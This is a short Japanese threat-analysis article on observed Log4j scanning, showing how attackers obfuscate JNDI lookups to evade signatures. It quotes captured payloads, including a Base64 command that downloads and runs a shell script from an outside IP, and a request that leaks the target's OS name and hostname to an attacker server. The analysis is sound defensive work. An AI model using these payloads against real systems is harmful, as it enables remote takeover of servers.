Criminal IPで分析したLog4jの攻撃パターン

Log4jの脆弱性が世界を襲った。ハッカーは、サーバーを丸ごと奪うためにLog4jの脆弱性に感染されたサーバーを見つけ、世界中のすべてのサーバーを毎日スキャンしています。ハッカーがlog4jの脆弱性を持っているサーバーを見つけるためにどのスキャン技術を使用しているかを調べました。 攻撃者は最も単純な方法で "${jndi:ldap://***.*.**.***:53/c}" パケットを送信し、サーバーの反応を調べます。しかし、このパターンはメディアなどにあまりにも多く公開されてきており、IDS・IPSで素早く検出されてブロックされています。したがって、下表のような変形した攻撃が使用されています。変更された攻撃パケットは、jndi:ldap のシグネチャを検出しないように j}ndi, {${::-j}${::-n}${::-d}${::-i}:${ ::-l}${::-d}${::-a}${::-p}, ${jndi:${lower:l}${lower:d}a${lower:p} などの形でペイロードを分割して送信する方法を使用します。   Log4jの一般的な攻撃パターン  ""t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}')"" ""t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}')"" 8080" "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F45.12.32.61%3A1389%2FOS%3D%24%7Bsys%3Aos.name%7D%2FHN%3D%24%7Benv%3AHOSTNAME%7D%2Ffeb12a13-5fe3-429a-bd12-ed0c72e2ad20%7D HTTP/1.1"" 403 152